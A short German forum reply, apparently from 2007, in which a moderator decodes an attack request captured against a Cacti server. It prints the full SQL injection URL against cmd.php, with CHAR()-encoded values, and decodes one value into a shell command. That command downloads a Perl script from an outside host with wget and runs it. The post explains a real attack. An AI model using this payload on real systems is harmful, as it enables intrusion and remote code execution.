Opened by bloonix at 2007-07-13 02:58
User since
2003-11-28
3645 Artikel
ModeratorIn
![[default_avatar]](/battie/theme/default/default_avatar.gif)
2003-11-28
3645 Artikel
ModeratorIn
[quote=opi,13.07.2007, 00:58]
[/quote]
Der letzte von den CHAR(...)-Aufrufen sieht übersetzt so aus:
Code: (dl
)
1
2
3
4
5
6
7
8
9
10
11
12
13
/cacti/cmd.php?1+1111)/**/UNION/**/SELECT/**/2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR(32,114,109,3
2,45,114,102,32,47,116,109,112,47,100,101,115,107,46,112,108,59,119,103,101,116,32,119,119
,119,46,115,104,97,100,121,46,49,115,116,104,111,115,116,46,111,114,103,4
7,100,101,115,107,46,112,108,32,45,79,32,47,116,109,112,47,100,101,115,107,46,112,108,59,1
12,101,114,108,32,47,116,109,112,47,100,101,115,107,46,112,108,59,114,109
,32,45,114,102,32,47,116,109,112,47,111,117,116,32,62,32,46,47,114,114,97,47,115,117,110,1
16,122,117,46,108,111,103),null,null/**/FROM/**/host/*+11111
Der letzte von den CHAR(...)-Aufrufen sieht übersetzt so aus:
Code: (dl
)
rm -rf /tmp/desk.pl;wget www.shady.1sthost.org/desk.pl -O /tmp/desk.pl;perl /tmp/desk.pl;rm -rf /tmp/out > ./rra/suntzu.log